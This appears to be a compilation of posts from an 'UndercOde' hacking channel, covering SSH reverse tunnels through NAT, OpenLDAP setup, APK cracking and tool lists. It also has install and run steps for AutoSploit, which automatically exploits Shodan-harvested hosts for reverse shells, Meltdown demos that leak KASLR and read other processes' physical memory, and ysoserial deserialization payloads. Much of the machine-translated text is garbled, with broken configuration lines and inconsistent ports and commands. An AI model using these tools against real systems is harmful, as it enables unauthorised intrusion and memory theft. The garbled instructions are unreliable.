▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Intranet penetration using SSH reverse tunnel
instagram.com/UndercOdeTestingCompany

1) No matter it is infiltration or in the open air, intranet penetration is an important link. We and our assigned intranet IP cannot be accessed through the extranet, so this article will show you how to use Linux. SSH reverse tunnel for intranet penetration.

2) Suppose machines A and B, A has a public IP, and B is behind NAT and has no available port forwarding.

3) Now I want to initiate an SSH connection to B from A. Because B is behind the NAT, there is no such combination of public IP + port available , so A cannot penetrate NAT. This article deals with this situation. Also encountered by most people.

🦑 Let's first assume the following machines:

Machine code Machine position address Account ssh / sshd port Do you need to run sshd
A Public network a.site usera twenty two Yes
B Behind NAT localhost userb twenty two Yes
C Behind NAT localhost userc twenty two no
SSH direction tunnel connection

4) This method refers to the active establishment of an SSH tunnel from B to A, which forwards port 6766 of A to port B. As long as the tunnel is not closed, this forwarding is effective. You only need to access A's 6766 port to connect to B in reverse.

5) First establish an SSH tunnel on B, and forward port 6676 of A to port 22 of B:


> B $ ssh -p 22 -qngfNTR 6766: localhost: 22 usera@a.site
Then use 6766 reverse SSH to B on A



> A $ ssh -p 6766 userb @ localhost
The thing to do is actually that simple.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Maintenance of the tunnel

> Stability maintenance

1) Unfortunately, the SSH connection will be closed overtime. If the connection is closed and the tunnel cannot be maintained, then A cannot use the reverse tunnel to penetrate B's NAT.

2) Therefore, we need a solution to provide a stable SSH To the tunnel.

3) One of the easiest methods is autossh. This software will automatically establish an SSH tunnel after a timeout. This solves the problem of tunnel stability. If you use Arch Linux, you can get it like this:

> $ sudo pacman -S autossh


4) Let's do something similar on B before, except that the tunnel will be maintained by autossh:

> B $ autossh -p 22 -M 6777 -NR 6766: localhost: 22 usera@a.site

5) The port specified by the -M parameter is used to monitor the status of the tunnel and has nothing to do with port forwarding.

> Then you can access B on port 6766 on A:

> A $ ssh -p 6766 user @ localhost

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 UDP hole punching, that is, through a machine on the public network, two machines that are respectively behind each NAT can establish SSH connections.
T.me/UndercOdeTesting

1) Here's how to use SSH reverse tunnel to connect C to B.

2) First edit the configuration file on A , turn on the switch:sshd/etc/ssh/sshd_configGatewayPorts

> GtaewayPorts yes
Then restart ssh

> A $ sudo systemct1 restart sshd
Then slightly modify the autossh command used on B:

> B $ autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' user@a.site
Then use C's port 6676 to connect to B on C:

> C $ ssh -p 6766 user@a.site

3) So far you have easily penetrated the two layers of NAT

4) Final solution
Combining the previously mentioned, the final solution is as follows:

5) First turn on the GatewayPorts switch of sshd on A and restart sshd.

6) Then create a new user autossh on B. According to the idea of ​​permission minimization, the autossh service handout on B runs as the user autossh to avoid security problems as much as possible:

>B $ sudo useradd -m autossh

> B $ sudo passwd autossh
Then create the SSH key for the autossh user on B and upload it to A:

> B $ su-autossh

> B $ ssh-keygen -t; rsa '-C' autossh @ B '

> B $ ssh-copy-id user@a.site

7) Be careful not to set a password for this key , that is ssh-keygen , do not enter extra characters despite entering all the way when running the command.

8) Then create a service file called with autossh user privileges on B. Write the following text to the file and set the permissions to 644:autossh/lib/systemd/system/autossh.service

1 [Unit]
2 Description = Auto SSH Tunnel
3 After = network-online.target
4 [Service]
5 User = autossh
6 Type = simple
7 ExecStart = / bin / autossh -p 22 -M 6777 -NR '*: 6766: localhost: 22' usera@a.site -i /home/autossh/.ssh/id_rsa
8 ExecReload = / bin / kill -HUP $ MAINPID
9 KillMode = process
10 Restart = always
11 [Install]
12 WantedBy = multi-user.target
13 WantedBy = graphical.target
Setting network-online.target on B takes effect:

9) B $ systemctl enable NetworkManager-wait-online
If you use systemd-networkd and you need to restart the service, it should be systemd-networkd-wait-online. Then set the service to start automatically:

> B $ systemctl enable autossh
If you like, you can start it immediately after this:

> B $ systemctl start autossh
Then you can use this reverse tunnel on A to penetrate B's NAT SSH connection to B:

> C $ ssh -p 6766 user @ localhost
Or SSH to C directly through two layers of NAT:

> C $ ssh -p 6766 user@a.site
If you are familiar with ssh, you can use this tunnel to do more things. For example, you can specify dynamic port forwarding when connecting backwards:

> C $ ssh -p 6766 -qngfNTD 7677 user@site.a

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to set up a basic OpenLDAP Server full by Underc 0de
>how to install and set up OpenLDAP centralized within a company's e-mail address book server for client queries. Basically, OpenLDAP is also used in many other areas, like centralized user account authentication servers, but email address book queries are the most commonly used.
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) go to www.openldap.org download the latest openldap package, follow the steps to compile and install, and then click Run:


#tar cvfz openldap-stable-20010524.tgz
#cd openldap-2.0.11
# / the configure.
#Make the depend
#make
#make test
#make install

2) My operating environment is redhat 6.1. If no errors are encountered, the LDAP daemon slapd is installed by default in the directory / usr / local / libexec; the configuration file is in the directory / usr / local / etc / openldap / and put various OpenLDAP tools
ldapadd, ldapdelete, ldapmodify, ldapmodrdn, ldappasswd, ldapsearch in the directory

3) / usr / local / bin, and the runtime database in / usr / local / var / openldap-ldbm.

🦑 Settings

1) Change the configuration file /usr/local/etc/openldap/slapd.conf
and add the following line after the include /usr/local/etc/openldap/schema/core.schema line to include all the schemes.

include /usr/local/etc/openldap/schema/corba.schema
include /usr/local/etc/openldap/schema/cosine.schema
include /usr/local/etc/openldap/schema/inetorgperson.schema
include / usr / local /etc/openldap/schema/java.schema
include /usr/local/etc/openldap/schema/krb5-kdc.schema
include /usr/local/etc/openldap/schema/misc.schema
include / usr / local / etc / openldap / schema / nadf.schema
include /usr/local/etc/openldap/schema/nis.schema
include /usr/local/etc/openldap/schema/openldap.schema

2) "ldbm database definitions" in file slapd.conf Partially change the corresponding
suffix, the rootdn line is as follows

database ldbm
suffix "o = yourdomain, c = us"
rootdn "cn = root, o = yourdomain, c = us"
rootpw secret
directory / usr / local / var / openldap-ldbm

> has a variety of formats you can use, here I use o = yourdomain, c = us to indicate the format of your company domain name and country or region rootdn after installation, the default is cn = Manager, changing to root here is completely your own preference, which is in line with the tradition that root has the highest permissions in Unix / Linux.

3) Now you can start slapd and run / usr / local / libexec / slapd.

You can consider adding / usr / local / bin and / usr / local / libexec to the search path, which is added to the PATH line in
/ etc / profile
:
PATH = "$ PATH: / usr / X11R6 / bin: / usr / local / bin: / usr / local / libexec "
so you only need to type slapd after the next login.

4) Test whether the ldap server is working properly.
Run the following command to check if there is corresponding output.

#ldapsearch -x -b "o = yourdomain, c = us" "(objectclass = *)"


5) Edit the .ldif text file and use ldapadd to add records to the LDAP database.
The content of the file is as follows:

dn: o = yourdomain, c = us
objectclass: dcobject
objectclass: organization
o: yourdomain
dc: yourdomain

DN: CN = jephe Wu, yourdomain = O, C = US
objectClass: inetOrgPerson
CN: Wu jephe
Sn: Wu
mail: jephe_wu@yourdomain.com


...... More Users ......

1) and so on, is added per Personal records enter this file. Note that the object type inetorgperson must have at least cn and sn. Here we use three definitions: cn, sn, and mail. This is sufficient for our email address book function. You can also define things like mobile, homephone, pager ... and so on.

2) Then use the following command to add the above .ldif file into the LDAP database

#ldapadd -x -D "cn = root, o = yourdomain, c = us" -w secret -f
"yourldiffilename"

Note: the first part of the above file " dn: o = yourdomain, c = us "is required, otherwise you cannot add data. Replace "yourdomain" above with your company's domain name.

3) Set Outlook Express to allow LDAP server to query email addresses.

> "Tools / Accounts / Add--Directory Service", fill in your server's IP address or the full domain name of the host, select yes in the next screen to allow the directory service to query the address, and finally check the "Directory Service" column just set Click "Properties / Advanced" for the project and fill in
"o = yourdomain, c = us" in "Search Base " .

4) Netscape Please set the corresponding options based on the information above.

🦑 Four. Common usage problems

1) There is no problem to start slapd, but the database cannot be added. An error occurred when running ldapadd "ldap_bind:
cannot contact LDAP Server".
Answer: The most likely reason is that there is no 127.0.0.1 localhost project in / etc / hosts.

2) Pay attention to the query order: If there is content in the address book of Outlook Express, the address book will be given priority when checking the address. If there is no corresponding record in the local address book, then query the LDAP server.

3) Use the following command to make sure that the client and the LDAP server have communication. Run the following command on the server, and then test the address in the OE. You will get the output of querying the connection process of the LDAP database.

# tcpdump port 389

THAT IT
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 openLDAP Features > ALL
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) OpenLDAP is a cross-platform standard Internet protocol based on the X.500 standard protocol.

2) OpenLDAP provides static data query searches without the need to maintain database information through SQL statements as in relational data.

3) OpenLDAP implements data synchronization between nodes based on a push and pull mechanism, referred to as replication, and provides a security authentication mechanism based on TLS and SASL to implement data encryption transmission and Kerberos password authentication functions.

4) OpenLDAP can implement load (LVS, HAProxy) and high-availability solutions based on third-party open source software, and provides authentication services such as Headbeat, Corosync, Keepalived, etc. 24 hours.

5) OpenLDAP data elements use simple text strings (referred to as LDIF files) instead of special characters to facilitate the maintenance and management of directory tree entries.

6) OpenLDAP can implement centralized authentication and management of users. All account changes need only be operated directly on the OpenLDAP server, without having to operate on each client. The scope of influence is global.

7) OpenLDAP uses a simple protocol by default, such as supporting the TCP / IP protocol to transfer entry data. By using a lookup operation to read and write directory tree entry information, it is also possible to obtain directory tree entry information in an encrypted manner.

8) OpenLDAP products are applied to major application platforms (Nginx, HTTP, vsftpd, Samba, SVN, Postfix, OpenStack, Hadoop, etc.), servers (HP, IBM, Dell, etc.) and storage (EMC, NetApp, etc.) consoles, and are responsible for account management Authentication function to achieve unified account management.

9) OpenLDAP implementation has the characteristics of low cost, simple configuration, powerful functions, easy management and open source.
OpenLDAP uses ACL (Access Control List) to flexibly control users' access to data, thereby ensuring data security.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Install openLDAP using docker
Installing openLDAP using docker is very simple.
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Run the following command to quickly set up an openLDAP server:

> docker run -p 389:389 -p 689:689 --name my-openldap-container --detach osixia/openldap:1.2.2

2) Parameter explanation:

-p 389:389 Exposing the container's port 389 to the host's port 389
-p 689:689 Exposing container's port 689 to the host's port 689
--name my-openldap-container Name the docker container 'my-openldap-container'
--detach Background process
osixia/openldap:1.2.2 Image name to run

3) After running the above command, an openLDAP service has been created.

4) Run the following command to test if the service started successfully:

> docker exec my-openldap-container ldapsearch -x -H ldap://localhost -b dc=example,dc=org -D "cn=admin,dc=example,dc=org" -w admin

5) If you get a return value similar to the following text, the service started successfully.

# extended LDIF
#
# LDAPv3
# base <dc=example,dc=org> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

[...]

# numResponses: 3
# numEntries: 2

🦑 openLDAP environment variable

1) By --env ]setting the initial values to start the service openLDAP containers, for example:

> docker run --env LDAP_ORGANISATION="My company" --env LDAP_DOMAIN="my-company.com" \
--env LDAP_ADMIN_PASSWORD="JonSn0w" --detach osixia/openldap:1.2.2

2) The common environment variables are as follows:

LDAP_ORGANISATIONname of association. Default is Example Inc.
LDAP_DOMAINLdap domain. Default is example.org
LDAP_BASE_DNLdap base DN. If empty, it is automatically set from the LDAP_DOMAIN value. Default is (empty)
LDAP_ADMIN_PASSWORDLdap administrator password. Default is admin
LDAP_CONFIG_PASSWORDLdap configuration password. Default is config
LDAP_READONLY_USERAdd read-only users. Default is false
LDAP_READONLY_USER_USERNAMERead-only username. Readonly by default
LDAP_READONLY_USER_PASSWORDRead-only user password. Readonly by default

🦑 The environment variables related to TLS are as follows:

LDAP_TLSAdded openldap TLS functionality. Cannot be deleted after set to true. The default is true.
LDAP_TLS_CRT_FILENAMELdap ssl certificate file name. Default is ldap.crt
LDAP_TLS_KEY_FILENAMELdap ssl certificate private key file name. Default is ldap.key
LDAP_TLS_CA_CRT_FILENAMELdap ssl CA certificate file name. Ca.crt by default
LDAP_TLS_ENFORCEEnforce TLS except for ldapi connections. Cannot be disabled after set to true. The default is false.
LDAP_TLS_CIPHER_SUITETLS cipher suite. The default is SECURE256: + SECURE128: -VERS-TLS-ALL: + VERS-TLS1.2: -RSA: -DHE-DSS: -CAMELLIA-128-CBC: -CAMELLIA-256-CBC, based on Red Hat's TLS hardening guide
LDAP_TLS_VERIFY_CLIENTTLS authentication client. Default is demand

🦑 The environment variables related to the copy operation are as follows:

1) LDAP_REPLICATIONAdd openldap replication. The default isfalse
LDAP_REPLICATION_CONFIG_SYNCPROVThe olcSyncRepl option used to configure the database. There are no rids and providers automatically added based on LDAP_REPLICATION_HOSTS. The default isbinddn="cn=admin,cn=config" bindmethod=simple credentials=

> $LDAP_CONFIG_PASSWORD searchbase="cn=config" type=refreshAndPersist retry="60 +" timeout=1 starttls=critical
LDAP_REPLICATION_DB_SYNCPROVOlcSyncRepl option for the database.

2) There are no rids and providers automatically added based on LDAP_REPLICATION_HOSTS. The default is binddn = `` cn = admin,LDAPBASEDN&quot;bindmethod=simplecredentials=LDAP_BASE_DN&quot; bindmethod=simple credentials=L D A P
B
A S E
D
N " b i n d m e t h o d=s i m p l e c r e d e n t i a l s= LDAP_ADMIN_PASSWORD searchbase = ”$ LDAP_BASE_DN" type = refreshAndPersist interval = 00: 00: 00: 10 retry = ”60 +” timeout = 1 starttls = critical

3) LDAP_REPLICATION_HOSTSThe replication host list must contain the current container host name set by –hostname on the docker run command. The default is:
- ldap：//ldap.example.org
- ldap：//ldap2.example.org

4) If you want to set this variable in the docker run command, add the tag # PYTHON2BASH: and convert yaml in python:

docker run --env LDAP_REPLICATION_HOSTS="#PYTHON2BASH:['ldap://ldap.example.org','ldap://ldap2.example.org']" --detach osixia/openldap:1.2.2

5) Other environment variables are as follows:

KEEP_EXISTING_CONFIGDo not change the ldap configuration. The default isfalse
true，config。image tlsLDAP_ADMIN_PASSWORD和LDAP_CONFIG_PASSWORD
true，]bootstap lschema，replication config。
LDAP_REMOVE_CONFIG_AFTER_SETUPDelete the configuration folder after installation. The default istrue

6) LDAP_SSL_HELPER_PREFIXssl-helper environment variable prefix. The default is ldap, and ssl-helper first searches for the configuration from the LDAP_SSL_HELPER_ * variables before the SSL_HELPER_ * variables.

7) HOSTNAMESet the host name of the running openldap server. Defaults to anything created by docker.

8) openLDAP data persistence
Add the following parameters to the docker run command to save the LDAP database file and LDAP configuration file outside the container. The same two parameters are added next time the container is re-created, that is, the existing ldap database can be used.

--volume /data/slapd/database:/var/lib/ldap \
--volume /data/slapd/config:/etc/ldap/slapd.d \

9) Install phpLDAPadmin
Install Apache and PHP
yum -y install httpd php php-ldap php-gd php-mbstring php-pear php-bcmath php-xml

10) Download phpldapadmin
wget https://nchc.dl.sourceforge.net/project/phpldapadmin/phpldapadmin-php5/1.2.3/phpldapadmin-1.2.3.tgz

Unzip phpldapadmin
tar -zxf phpldapadmin-1.2.3.tgz

11) Put the phpldapadmin directory under / var / www / html
mv phpldapadmin-1.2.3 /var/www/html/phpldapadmin

12) Modify the configuration file
cd /var/www/html/phpldapadmin/config
cp config.php.example config.php
vim config.php

13) The configuration file is modified as follows:
$servers->newServer('ldap_pla');
$servers->setValue('server','name','LDAP Server');
$servers->setValue('server','host','127.0.0.1');
$servers->setValue('server','port',389);
$servers->setValue('server','base',array('[openLDAP'));/：dc=example,dc=org*/
$servers->setValue('login','auth_type','session');
$servers->setValue('login','bind_id','openLDAP]');/*=：cn=admin,dc=example,dc=org*/
$servers->setValue('login','bind_pass','[openLDAP]');/*：admin*/
$servers->setValue('server','tls',false);

14) Start httpd service
systemctl start httpd

15) If you need to modify the configuration file, you need to modify the config.phpfile and restart the httpd service.systemctl restart httpd

16) After configuration, http://[ip]/phpldapadminyou can access it by typing in the browser . Note that you need to open port 80 or close the firewall

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crack any android apk process by UndercOde 2 main methodes >
Briefly describe the generation process of Android apk:
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) java source code

2) java apk Compile

3) class file

4) dxTool conversion and packaging compression

5) Add third-party, other library files

6) dex file

7) apkbuilder packaging

8) Plus other resource files resources.arsc, other libraries, etc.
(Unsigned) apk file

9) jarsigner to sign + zipalign to process
(Signed) apk file

10) Can be used to publish and list various Android application markets

11) Download and install trial for ordinary users
@UndercOdeTesting
🦑 I want to crack the Android apk, which is the reverse operation:

1) Reverse (hook to dump) the dex file from the apk (the app during the runtime)

2) If it is ordinary reinforcement

3) You can successfully export dex with tools such as FDex2

4) If it is an advanced reinforcement solution

5) It is more difficult to estimate

6) Decompile the jar package from the dex file (there are various classes inside)

7) Some dex decompilation will cause various errors

8) It is estimated that the reinforcement scheme is more advanced.

9) Some dex decompiles without error

10) If it is the code that we want to include the app business logic

11) Then the Java source code of the program can be perfectly cracked afterwards

12) Decompile the java source code from the jar package

13) You can view and export all java source code
note:

> Currently if the code was previously obfuscated

14) Finally here is the obfuscated code

🦑 It's not easy to see the business logic of the original code
Description

1) This process corresponds to the previous compilation, so the strict name is called:

> Decompile = decompile

2) The corresponding tool is called: decompiler
Decompiler = decoder = decompiler

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Shells
best base base shell used by Hackers
>twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) bash - GNU Project's shell (Bourne Again SHell)
> https://www.gnu.org/software/bash/

2) elvish - Friendly, expressive shell features like anonymous functions and data structures
> https://elv.sh/

3) fish - Smart and user-friendly command line shell
> https://fishshell.com/

4) ksh93 - Korn Shell
>https://github.com/att/ast

5) mksh - MirBSD Korn Shell
>

6) nushell - A modern shell written in Rust

7) oksh - Portable OpenBSD ksh

8) osh - Bash compatible, with new/modern Unix shell language called Oil

9) pdksh - Public domain Korn shell

10) shell++ - Friendly and modern functional and object oriented shell script language

11) shenv - Simple shell version management

12) tcsh - C shell with file name completion and command line editing

13) xiki - Makes the shell console more friendly and powerful

14) xonsh - Python-ish, BASHwards-looking shell language and command prompt

15) yash - A POSIX-compliant command line shell with built-in support for completion and prediction based on command history

16) zsh - Powerful shell with scripting language
>https://github.com/nushell/nushell

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Custom prompts, color themes, Best tools for Linux Os-Free-opensources @Github repo
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) base16-builder - Base16-Builder

2) bash-full-of-colors - Powerful prompt with screen, tmux, git support and many more

3) bash-git-prompt - An informative and fancy Bash prompt for Git users

4) bash-powerline - Powerline-style Bash prompt in pure Bash script

5) bashstrap - A quick way to spruce up OSX terminal

6) bullet-train-oh-my-zsh-theme - An oh-my-zsh shell theme based on the Powerline Vim plugin

6) emojify Emoji on the command line

7) flatui-terminal-theme - Nicer colors for terminal

8) geometry - A minimal ZSH theme where any function can be added to the left prompt or (async) right prompt on the fly.

9) git-prompt - Bash prompt with Git, SVN and HG modules

10) gittify - A colorful Bash prompt + customized Git aliases

11) Gogh - Color Scheme - Color Scheme for Gnome Terminal

12) liquidprompt - A full-featured & carefully designed adaptive prompt for Bash & Zsh

13) mysql-colorize - Colorization for mysql comand-line client

14) oh-my-git - An opinionated git prompt for bash and zsh

15) polyglot - An informative Git prompt that works in bash, zsh, ksh, mksh, pdksh, dash, and busybox sh

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tools needed for secure penetration-Any Linux OS 2020
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Tools required for penetration :

splint unhide scrub
pscan examiner ht
flawfinder srm driftnet
rats nwipe binwalk
ddrescue firstaidkit-gui scalpel
gparted xmount pdfcrack
testdisk dc3dd wipe
foremost afftools safecopy
sectool-gui scanmem hfsutils
unhide sleuthkit cmospwd
examiner macchanger secuirty-menus
srm ngrep nc6
nwipe ntfs-3g mc
firstaidkit-gui ntfsprogs screen
net-snmp pcapdiff openvas-scanner
hexedit netsed rkhunter
irssi dnstop labrea
powertop sslstrip nebula
mutt bonesi tripwire
nano proxychains prelude-lml
vim-enhanced prewikka iftop
wget prelude-manager scamper
yum-utils picviz-gui iptraf-ng
mcabber telnet iperf
firstaidkit-plugin-all onenssh nethogs
vnstat dnstracer uperf
aircrack-ng chkrootkit nload
airsnort aide ntop
kismet pads trafshow
weplab cowpatty wavemon

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2019 later update-topic exploite script :
pinterest.com/UndercodeOfficial

🦑Features :

1) As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts.

2) Targets can be collected automatically through Shodan, Censys or Zoomeye.

> But options to add your custom targets and host lists have been included as well.

3) The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started

4) Operational Security Consideration:
Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.

5) The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

> Docker Compose
Using Docker Compose is by far the easiest way to get AutoSploit up and running without too much of a hassle.

1) git clone https://github.com/NullArray/AutoSploit.git

2) cd Autosploit/Docker

3) docker-compose run --rm autosploit
Docker

🦑 Just using Docker.

1) git clone https://github.com/NullArray/AutoSploit.git

2) cd Autosploit/Docker
# If you wish to edit default postgres service details, edit database.yml. Should work out of the box
# nano database.yml

> docker network create -d bridge haknet

> docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres

> docker build -t autosploit .

> docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit

🦑Any Linux

1) git clone https://github.com/NullArray/AutoSploit

2) cd AutoSploit

3) chmod +x install.sh

4) ./install.sh

🦑 MacOs

> AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. In order to accomplish this employ/perform the below operations via the terminal or in the form of a shell script.

1) > sudo -s << '_EOF'

2) pip2 install virtualenv --user

3) git clone https://github.com/NullArray/AutoSploit.git

4) virtualenv <PATH-TO-YOUR-ENV>

5) source <PATH-TO-YOUR-ENV>/bin/activate

6) cd <PATH-TO-AUTOSPLOIT>

7) pip2 install -r requirements.txt

8) chmod +x install.sh

9) ./install.sh

10) python autosploit.py
_EOF

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

# SUPPORT & SHARE

T.me/UndercOdeTesting

🦑 all http injectors tricks in africa > patched > lastest report

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Meltdown lastest bug :
The applications in this repository are built with libkdump, a library we developed for the paper. This library simplifies exploitation of the bug by automatically adapting to certain properties of the environment.
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

on ubuntu

1) sudo yum install -y glibc-static

2) git clone https://github.com/IAIK/meltdown

3) make

4) taskset 0x1 ./test

5) + demo vid - inside same git link

🦑Starting with Linux kernel 4.12, KASLR (Kernel Address Space Layout Randomizaton) is active by default. This means, that the location of the kernel (and also the direct physical map which maps the entire physical memory) changes with each reboot.

1) This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.

> Build and Run

> make

>sudo taskset 0x1 ./kaslr

2) After a few seconds, you should see something similar to this

[+] Direct physical map offset: 0xffff880000000000

🦑Reliability test (reliability)
TNow tests how reliable physical memory can be read. For this demo, you either need the direct physical map offset or you have to disable KASLR by specifying nokaslr in your kernel command line.

> Build and Run

Build and start reliability. If you have KASLR enabled, the first parameter is the offset of the direct physical map. Otherwise, the program does not require a parameter.

> make

> sudo taskset 0x1 ./reliability 0xffff880000000000

> After a few seconds, you should get an output similar to this:

[-] Success rate: 99.93% (read 1354 values)
Demo #4: Read physical memory (physical_reader)

🦑 Now reads memory from a different process by directly reading physical memory> ) or you have to disable KASLR by specifying nokaslr in your kernel command line.

> In principal, this program can read arbitrary physical addresses. However, as the physical memory contains a lot of non-human-readable data, we provide a test tool (secret), which puts a human-readable string into memory and directly provides the physical address of this string.

1) Build and Run
For the demo, first run secret (as root) to get the physical address of a human-readable string:

2) make

3) sudo ./secret
It should output something like this:

[+] Secret: If you can read this, this is really bad
[+] Physical address of secret: 0x390fff400
[+] Exit with Ctrl+C if you are done reading the secret
While the secret program is running, start physical_reader. The first parameter is the physical address printed by secret. If you do not have KASLR disabled, the second parameter is the offset of the direct physical map.

4) taskset 0x1 ./physical_reader 0x390fff400 0xffff880000000000
After a few seconds, you should get an output similar to this:

[+] Physical address : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Reading virtual address: 0xffff880390fff400

5) If you can read this, this is really bad

🦑 Dump the memory (memdump)
This demo dumps the content of the memory. As demo #3 and #4, it uses the direct physical map, to dump the contents of the physical memory in a hexdump-like format.

> Again, as the physical memory contains a lot of non-human-readable content, we provide a test tool to fill large amounts of the physical memory with human-readable strings.

Build and Run
For the demo, first run memory_filler to fill the memory with human-readable strings. The first argument is the amount of memory (in gigabytes) to fill.

> make

> ./memory_filler 9

> Then, run the memdump tool to dump memory contents. If you executed memory_filler before, you should see some string fragments. If you have Firefox or Chrome with multiple tabs running, you might also see parts of the websites which are open or were recently closed.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to generating payloads that exploit unsafe Java object deserialization

1) ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects.

2) The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ

1) git clone https://github.com/frohoff/ysoserial

2) cd ysoserial

3) java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure @JackOfMostTrades clojure:1.8.0

./........

4) java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd

5) mvn clean package -DskipTests

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 General X Window Options > commands :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> descriptions of the commands of the X Window System. These commands have a common set of parameters. Instead of listing these parameters in the description of each command, we will list them here.
> General X Window Options

> PARAMETER VALUE
-background
red green sippy

Setting a cyst background
-background color Setting the background color of the window
